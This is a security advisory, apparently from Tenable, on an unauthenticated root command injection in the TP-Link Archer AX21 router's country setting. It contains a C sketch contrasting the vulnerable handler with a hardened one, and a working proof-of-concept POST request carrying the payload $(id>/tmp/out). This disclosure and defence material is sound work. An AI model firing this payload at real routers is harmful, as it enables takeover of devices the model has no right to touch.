Synopsis
Researchers at Tenable discovered an unauthenticated command injection in the web management interface of the TP-Link Archer AX21 (AX1800). This issue was also independently discovered by other research teams, as noted in ZDI-23-451.
Update 24 April 2023: As described in a blog post released by the Zero Day Initiative, when chained with ZDI-23-452 / CVE-2023-27359 this bug can be exploited by an unauthenticated attacker from the WAN (internet-facing) side of the router, not only from the LAN.
Technical Details
The country parameter of the write callback for the country form, reached at the /cgi-bin/luci/;stok=/locale endpoint, is vulnerable to a simple command injection.
The value of the country parameter is passed to popen(), which runs as root. The value is not executed by the request that sets it: it is stored first, and is only interpolated into the popen() command when a later request triggers the callback again.
To exploit the issue, an attacker first sends the payload as the country parameter so that it is stored, then sends a second request (identical or not) to the same endpoint; the payload stored by the first request is then executed as part of the popen() command.
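The following C program is an added illustration of the stateful pattern described above, written for this page; it is not TP-Link's firmware code, and the helper command name set_region, the state struct and the two-letter country-code shape are assumptions. The vulnerable handler stores the parameter and, on the next call, builds a shell command string from the previously stored value (the string that would be handed to popen()). The hardened variant beside it rejects anything that is not a plausible country code before storing it, and runs the helper through execvp() with an argv array instead of a shell, so shell metacharacters such as $( ) are never interpreted.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

#define CMD_MAX 256

/* Configuration state kept between requests (assumed representation). */
struct country_state {
    char value[64];
};

/* Vulnerable write handler, reconstructing the behaviour described in the
 * advisory: the new value is stored, but the command is built from the value
 * stored by the PREVIOUS request. Returns the command string that would be
 * passed to popen(), or NULL on the first call when nothing is stored yet.
 * "set_region" is a hypothetical helper; the real command is not given. */
const char *vuln_country_write(struct country_state *st, const char *country,
                               char *cmd, size_t cmd_len)
{
    const char *result = NULL;
    if (st->value[0] != '\0') {
        /* Unvalidated, shell-interpreted interpolation: the injection point. */
        snprintf(cmd, cmd_len, "set_region %s", st->value);
        result = cmd;
    }
    snprintf(st->value, sizeof st->value, "%s", country);
    return result;
}

/* Hardened variant, change 1: validate the shape before storing.
 * Assumed shape: exactly two ASCII letters, e.g. "US". */
int is_valid_country(const char *s)
{
    if (s == NULL || strlen(s) != 2)
        return 0;
    return isalpha((unsigned char)s[0]) && isalpha((unsigned char)s[1]);
}

/* Returns 1 and stores the value if it passes validation, 0 otherwise
 * (nothing is stored, so no later request can pick up a bad value). */
int safe_country_write(struct country_state *st, const char *country)
{
    if (!is_valid_country(country))
        return 0;
    snprintf(st->value, sizeof st->value, "%s", country);
    return 1;
}

/* Hardened variant, change 2: run the helper without /bin/sh. The value is a
 * single argv element, so "$(...)", ";" or "|" inside it have no meaning.
 * Returns the child's exit status, or -1 on fork/wait failure. */
int run_noshell(const char *prog, const char *country)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *argv[] = { (char *)prog, (char *)country, NULL };
        execvp(prog, argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample input: the payload from the advisory's PoC. */
    const char *payload = "$(id>/tmp/out)";
    struct country_state vuln = {{0}};
    char cmd[CMD_MAX];

    /* Request 1 stores the payload, request 2 would execute it as root. */
    printf("request 1 -> popen: %s\n", vuln_country_write(&vuln, payload, cmd, sizeof cmd) ? cmd : "(nothing)");
    printf("request 2 -> popen: %s\n", vuln_country_write(&vuln, payload, cmd, sizeof cmd) ? cmd : "(nothing)");

    /* Hardened handler: the payload is rejected and never stored. */
    struct country_state safe = {{0}};
    printf("hardened accepts payload: %d\n", safe_country_write(&safe, payload));
    printf("hardened accepts \"US\":   %d\n", safe_country_write(&safe, "US"));
    if (safe.value[0] != '\0')
        printf("set_region exit status (no shell): %d\n", run_noshell("set_region", safe.value));
    return 0;
}
```

The second printed line shows the exact string a shell would receive ("set_region $(id>/tmp/out)"), which is why the output of id lands in /tmp/out on the second request and not the first. Validation alone is enough to stop this particular payload; exec without a shell is the defence that still holds if the validation is later loosened.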
Proof of Concept:
Sending a request similar to the following twice in a row would run the $(id>/tmp/out) command on the second request, creating the /tmp/out file containing the output of the id command.
POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
Host: <target router>
Content-Type: application/x-www-form-urlencoded

operation=write&country=$(id>/tmp/out)
Solution
TP-Link has released firmware version 1.1.4 Build 20230219, which fixes the issue by removing the vulnerable callback.
Additional References
https://www.tp-link.com/us/support/download/archer-ax21/v3/#Firmware
https://www.zerodayinitiative.com/advisories/ZDI-23-451/
https://www.zerodayinitiative.com/advisories/ZDI-23-452/
https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]